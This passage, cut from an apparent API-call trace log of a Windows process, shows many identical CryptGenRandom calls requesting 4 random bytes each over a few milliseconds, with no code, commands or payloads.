pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.014] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | 